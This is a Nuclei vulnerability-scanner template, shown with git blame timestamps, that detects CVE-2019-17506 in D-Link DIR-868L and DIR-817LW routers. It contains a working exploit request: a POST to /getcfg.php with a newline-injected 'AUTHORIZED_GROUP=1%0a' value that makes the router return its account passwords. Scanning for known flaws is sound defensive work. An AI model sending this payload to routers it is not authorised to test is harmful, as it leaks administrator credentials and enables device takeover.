nuclei-templates/cves/2019/CVE-2019-17506.yaml

30 lines
596 B
YAML
Raw Normal View History

2021-02-01 00:41:22 +00:00
id: CVE-2019-17506
info:
2021-02-01 17:02:44 +00:00
name: DLINK DIR-868L & DIR-817LW Info Leak
2021-02-01 00:41:22 +00:00
author: pikpikcu
2021-02-01 17:02:44 +00:00
severity: critical
2021-02-01 00:41:22 +00:00
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17506
tags: cve,cve2019,dlink
2021-02-01 00:41:22 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/getcfg.php"
2021-02-01 17:02:44 +00:00
2021-02-01 00:41:22 +00:00
body: |
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
headers:
Content-Type: text/xml
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</password>"
- "DEVICE.ACCOUNT"
part: body